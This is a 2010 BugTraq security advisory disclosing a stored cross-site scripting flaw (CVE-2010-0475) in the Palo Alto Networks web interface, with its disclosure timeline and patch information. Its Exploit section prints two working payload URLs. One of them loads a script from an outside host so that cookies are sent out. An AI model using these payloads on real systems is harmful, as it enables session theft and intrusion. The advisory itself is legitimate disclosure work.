BugTraq
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS) May 12 2010 04:34PM
jeromie comsecinc com
Class: Cross-Site Scripting (XSS) Vulnerability

CVE: CVE-2010-0475

Remote: Yes

Local: Yes

Published: May 11, 2010 08:30AM

Timeline:Submission to MITRE: 1/18/2010

Vendor Contact: 2/18/2010

Vendor Response: 2/18/2010

Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)

Credit: Jeromie Jackson CISSP, CISM

COBIT & ITIL Certified

President- San Diego Open Web Application Security Project (OWASP)

Vice President- San Diego Information Audit & Control Association (ISACA)

SANS Mentor

LinkedIn: www.linkedin.com/in/securityassessment

Blog: www.JeromieJackson.com

Twitter: www.twitter.com/Security_Sifu

Validated Vulnerable:

Latest Version Per December 31, 2009

Discussion:

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity.

Exploit:

Single Line working- https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&dev
iceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&pro
file=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadm
in<SCRIPT>alert("0wn3d")</SCRIPT>

&admin-role=%5Bobject+Object%5D&bSubmit=O

WORKING FOR REDIRECT TO LOAD cookies into URL.

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&dev
iceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&pro
file=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadm
in<SCRIPT/XSS SRC="http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobj
ect+Object%5D&bSubmit=O

Solution:

A patch will be required from the vendor. It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application.

References:

OWASP Cross-Site Scripting (XSS) Attack Discussion

Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus